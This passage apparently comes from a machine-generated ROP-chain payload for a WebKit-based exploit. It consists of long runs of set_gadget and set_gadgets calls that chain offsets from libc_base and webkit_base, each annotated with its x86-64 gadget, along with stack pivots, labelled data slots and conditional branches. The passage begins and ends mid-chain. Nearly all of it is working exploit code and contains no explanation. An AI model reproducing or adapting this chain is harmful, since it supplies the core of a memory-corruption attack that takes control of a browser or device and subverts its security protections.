set_gadget(libc_base+759608,); //pop rax //L140: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+71680, //L142 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+71664, //L141 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L141: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L142: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L144: db([65280, 0]); // 0xff00 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+71792, //L145 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L145: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L147: db([8, 0]); // 0x8 set_gadget(libc_base+763368,); //pop rcx //L148: db([8, 0]); // 0x8 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+71976, //L150 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L150: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+72032, //L151 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L151: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+72144, //L153 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L153: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L155: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+72264, //L158 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+72248, //L156 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L156: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L158: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+72440, //L161 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+72456, //L162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+72408, //L159 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+72424, //L160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L159: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L160: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L161: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L162: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+72552, //L164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+72536, //L163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L163: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L164: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L165: db([24, 0]); // 0x18 set_gadget(libc_base+763368,); //pop rcx //L166: db([24, 0]); // 0x18 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+72704, //L168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L168: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+72760, //L169 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L169: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+72896, //L173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+72880, //L172 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L171: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L172: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L173: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+73016, //L174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73048, //L176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+73032, //L175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L174: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L175: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L176: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73152, //L177 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73168, //L178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L177: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L178: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73288, //L179 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73272, //L180 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L180: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L179: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+73376, //L182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+73360, //L181 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L181: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L182: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73480, //L183 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73496, //L184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L183: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L184: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73616, //L185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+73600, //L186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L186: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L185: db([0, 0]); // 0x0 //___builtin_bswap64: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+73688, //L188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L188: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+73752, //L190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L190: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([16, 0]); // 0x10 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+73832, //L191 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L191: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L193: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+73904, //L194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L194: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L196: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L197: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L199: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+74040, //L201 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L200: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L201: db([0, 0]); // 0x0 set_gadgets([ webkit_base+3488438, //mov [rax], ecx libc_base+764760, //pop rsi ropchain+74096, //L203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L203: db([0, 0]); // 0x0 //L202: set_gadgets([ libc_base+764760, //pop rsi ropchain+74144, //L205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L205: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L207: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+74264, //L210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+74248, //L208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L208: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L210: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+74440, //L213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+74456, //L214 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+74408, //L211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+74424, //L212 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L211: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L212: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L213: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L214: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+74536, //L215 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+74552, //L216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L215: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L216: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+74648, //L218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+74632, //L217 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L217: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L218: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+74728, //L219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L219: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L220: db([4, 0]); // 0x4 set_gadget(libc_base+144605,); //pop rdi //L221: db([4, 0]); // 0x4 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+74872, //L222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+74904, //L224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+74888, //L223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L222: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L223: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L224: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+75080, //L226 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+75096, //L227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+75064, //L225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L225: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L226: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L227: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+75208, //L229 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+75256, //L232 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+75224, //L230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L229: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L230: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L231: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L232: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+75368, //L233+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+75360, //L233 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L233: db([0, 0]); // 0x0 set_gadgets([ ropchain+75384, //L233+24 ropchain+75400, //L228 libc_base+782311, //pop rsp ropchain+75416, //L234 //L228: libc_base+782311, //pop rsp ropchain+86016, //L235 //L234: libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L236: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L238: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+75552, //L241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+75536, //L239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L239: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L241: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+75696, //L244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+75664, //L242 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+75680, //L243 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L242: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L243: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L244: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+75768, //L246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L246: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+75824, //L247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L247: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L249: db([7, 0]); // 0x7 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+75952, //L250 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L250: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L252: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+76072, //L255 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76056, //L253 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L253: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L255: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+76248, //L258 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76264, //L259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76216, //L256 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+76232, //L257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L256: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L257: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L258: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L259: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+76376, //L260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76408, //L262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+76392, //L261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L260: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L261: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L262: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+76520, //L263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76536, //L264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L263: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L264: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+76624, //L266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L266: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+76680, //L267 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L267: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+76824, //L270 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+76840, //L271 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76808, //L269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L269: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L270: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L271: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+77000, //L275 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+76968, //L273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+76984, //L274 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L272: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L273: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L274: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L275: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+77056, //L277 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L277: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+77184, //L279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+77200, //L280 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77168, //L278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L278: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L279: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L280: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+77360, //L284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+77328, //L282 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77344, //L283 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L281: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L282: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L283: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L284: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+77416, //L286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L286: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+77544, //L288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+77560, //L289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77528, //L287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L287: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L288: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L289: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+77720, //L293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+77688, //L291 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+77704, //L292 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L290: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L291: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L292: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L293: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+77776, //L295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L295: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl 